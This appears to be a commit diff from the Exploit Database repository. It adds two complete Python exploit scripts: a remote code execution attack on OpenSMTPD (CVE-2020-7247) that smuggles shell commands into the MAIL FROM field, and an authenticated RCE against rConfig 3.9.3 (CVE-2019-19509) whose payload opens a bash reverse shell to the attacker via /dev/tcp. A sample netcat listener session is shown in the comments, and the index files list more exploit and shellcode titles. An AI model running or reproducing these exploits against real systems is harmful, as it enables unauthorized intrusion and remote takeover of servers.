DB: 2020-01-31

3 changes to exploits/shellcodes OpenSMTPD 6.6.2 - Remote Code Execution rConfig 3.9.3 - Authenticated Remote Code Execution Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)
zatkh · Jan 31, 2020 · 9f56865 · 9f56865
1 parent 3b5a0d9
commit 9f56865
Show file tree

Hide file tree

Showing 5 changed files with 575 additions and 0 deletions.
diff --git a/exploits/linux/remote/47984.py b/exploits/linux/remote/47984.py
@@ -0,0 +1,68 @@
+# Exploit Title: OpenSMTPD 6.6.2 - Remote Code Execution
+# Date: 2020-01-29
+# Exploit Author: 1F98D
+# Original Author: Qualys Security Advisory
+# Vendor Homepage: https://www.opensmtpd.org/
+# Software Link: https://github.com/OpenSMTPD/OpenSMTPD/releases/tag/6.6.1p1
+# Version: OpenSMTPD < 6.6.2
+# Tested on: Debian 9.11 (x64)
+# CVE: CVE-2020-7247
+# References:
+# https://www.openwall.com/lists/oss-security/2020/01/28/3
+#
+# OpenSMTPD after commit a8e222352f and before version 6.6.2 does not adequately
+# escape dangerous characters from user-controlled input. An attacker
+# can exploit this to execute arbitrary shell commands on the target.
+# 
+#!/usr/local/bin/python3
+
+from socket import *
+import sys
+
+if len(sys.argv) != 4:
+    print('Usage {} <target ip> <target port> <command>'.format(sys.argv[0]))
+    print("E.g. {} 127.0.0.1 25 'touch /tmp/x'".format(sys.argv[0]))
+    sys.exit(1)
+
+ADDR = sys.argv[1]
+PORT = int(sys.argv[2])
+CMD = sys.argv[3]
+
+s = socket(AF_INET, SOCK_STREAM)
+s.connect((ADDR, PORT))
+
+res = s.recv(1024)
+if 'OpenSMTPD' not in str(res):
+    print('[!] No OpenSMTPD detected')
+    print('[!] Received {}'.format(str(res)))
+    print('[!] Exiting...')
+    sys.exit(1)
+
+print('[*] OpenSMTPD detected')
+s.send(b'HELO x\r\n')
+res = s.recv(1024)
+if '250' not in str(res):
+    print('[!] Error connecting, expected 250')
+    print('[!] Received: {}'.format(str(res)))
+    print('[!] Exiting...')
+    sys.exit(1)
+
+print('[*] Connected, sending payload')
+s.send(bytes('MAIL FROM:<;{};>\r\n'.format(CMD), 'utf-8'))
+res = s.recv(1024)
+if '250' not in str(res):
+    print('[!] Error sending payload, expected 250')
+    print('[!] Received: {}'.format(str(res)))
+    print('[!] Exiting...')
+    sys.exit(1)
+
+print('[*] Payload sent')
+s.send(b'RCPT TO:<root>\r\n')
+s.recv(1024)
+s.send(b'DATA\r\n')
+s.recv(1024)
+s.send(b'\r\nxxx\r\n.\r\n')
+s.recv(1024)
+s.send(b'QUIT\r\n')
+s.recv(1024)
+print('[*] Done')
diff --git a/exploits/php/webapps/47982.py b/exploits/php/webapps/47982.py
@@ -0,0 +1,75 @@
+# Exploit Title: rConfig 3.9.3 - Authenticated Remote Code Execution
+# Date: 2019-11-07
+# CVE-2019-19509
+# Exploit Author: vikingfr
+# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)
+# Software Link : http://files.rconfig.com/downloads/scripts/centos7_install.sh
+# Version: tested v3.9.3
+# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24
+#
+# Notes : If you want to reproduce in your lab environment follow those links :
+# http://help.rconfig.com/gettingstarted/installation
+# then
+# http://help.rconfig.com/gettingstarted/postinstall
+#
+# $ python3 rconfig_CVE-2019-19509.py https://192.168.43.34 admin root 192.168.43.245 8081
+# rconfig - CVE-2019-19509 - Web authenticated RCE
+# [+] Logged in successfully, triggering the payload...
+# [+] Check your listener !
+# ...
+# $ nc -nvlp 8081
+# listening on [any] 8081 ...
+# connect to [192.168.43.245] from (UNKNOWN) [192.168.43.34] 34458
+# bash: no job control in this shell
+# bash-4.2$ id
+# id
+# uid=48(apache) gid=48(apache) groups=48(apache)
+# bash-4.2$ 
+
+#!/usr/bin/python3
+
+import requests
+import sys
+import urllib.parse
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+print ("rconfig - CVE-2019-19509 - Web authenticated RCE")
+
+if len(sys.argv) != 6:
+    print ("[+] Usage : ./rconfig_exploit.py https://target username password yourIP yourPort")
+    exit()
+
+target = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+ip = sys.argv[4]
+port = sys.argv[5]
+payload = '''`bash -i>& /dev/tcp/{0}/{1} 0>&1`'''.format(ip, port)
+
+request = requests.session()
+
+login_info = {
+    "user": username,
+    "pass": password,
+    "sublogin": 1
+}
+
+login_request = request.post(
+    target+"/lib/crud/userprocess.php",
+     login_info,
+     verify=False,
+     allow_redirects=True
+ )
+
+dashboard_request = request.get(target+"/dashboard.php", allow_redirects=False)
+
+if dashboard_request.status_code == 200:
+    print ("[+] Logged in successfully, triggering the payload...")
+    encoded_request = target+"/lib/ajaxHandlers/ajaxArchiveFiles.php?path={0}&ext=random".format(urllib.parse.quote(payload))
+    print ("[+] Check your listener !")
+    exploit_req = request.get(encoded_request)
+
+elif dashboard_request.status_code == 302:
+    print ("[-] Wrong credentials !")
+    exit()
diff --git a/files_exploits.csv b/files_exploits.csv
@@ -17953,6 +17953,7 @@ id,file,description,date,author,type,platform,port
 47924,exploits/linux/remote/47924.rb,"Barco WePresent - file_transfer.cgi Command Injection (Metasploit)",2020-01-15,Metasploit,remote,linux,
 47936,exploits/hardware/remote/47936.js,"Sagemcom F@ST 3890 (50_10_19-T1) Cable Modem - 'Cable Haunt' Remote Code Execution",2020-01-15,Lyrebirds,remote,hardware,
 47956,exploits/linux/remote/47956.py,"Pachev FTP Server 1.0 - Path Traversal",2020-01-23,1F98D,remote,linux,21
+47984,exploits/linux/remote/47984.py,"OpenSMTPD 6.6.2 - Remote Code Execution",2020-01-30,1F98D,remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42278,3 +42279,4 @@ id,file,description,date,author,type,platform,port
 47977,exploits/php/webapps/47977.txt,"Centreon 19.10.5 - 'Pollers' Remote Command Execution",2020-01-29,"Omri Baso",webapps,php,
 47978,exploits/php/webapps/47978.txt,"Centreon 19.10.5 - 'centreontrapd' Remote Command Execution",2020-01-29,"Fabien AUNAY",webapps,php,
 47979,exploits/hardware/webapps/47979.txt,"Fifthplay S.A.M.I 2019.2_HP - Persistent Cross-Site Scripting",2020-01-29,LiquidWorm,webapps,hardware,
+47982,exploits/php/webapps/47982.py,"rConfig 3.9.3 - Authenticated Remote Code Execution",2020-01-30,vikingfr,webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
@@ -1013,3 +1013,4 @@ id,file,description,date,author,type,platform
 47877,shellcodes/linux/47877.c,"Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)",2020-01-06,bolonobolo,shellcode,linux
 47890,shellcodes/linux/47890.c,"Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes)",2020-01-08,"Xenofon Vassilakopoulos",shellcode,linux
 47953,shellcodes/windows/47953.c,"Windows/7 - Screen Lock Shellcode (9 bytes)",2020-01-22,"Saswat Nayak",shellcode,windows
+47980,shellcodes/windows/47980.txt,"Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)",2020-01-30,boku,shellcode,windows